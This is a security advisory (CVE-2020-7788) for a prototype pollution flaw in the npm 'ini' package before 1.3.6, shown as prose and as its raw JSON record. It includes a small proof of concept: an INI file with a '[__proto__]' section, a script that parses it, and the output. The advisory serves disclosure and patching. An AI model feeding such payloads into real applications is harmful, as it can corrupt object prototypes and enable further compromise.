GHSA-QQGX-2P2H-9C37
Vulnerability from github – Published: 2020-12-10 16:53 – Updated: 2022-12-03 03:55
VLAI?
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Details
Overview
The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js:
var fs = require('fs')
var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
Severity ?
7.3 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ini"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7788"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-12-10T16:51:39Z",
"nvd_published_at": "2020-12-11T11:15:00Z",
"severity": "HIGH"
},
"details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```",
"id": "GHSA-qqgx-2p2h-9c37",
"modified": "2022-12-03T03:55:11Z",
"published": "2020-12-10T16:53:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788"
},
{
"type": "WEB",
"url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1"
},
{
"type": "PACKAGE",
"url": "https://github.com/npm/ini"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-INI-1048974"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1589"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…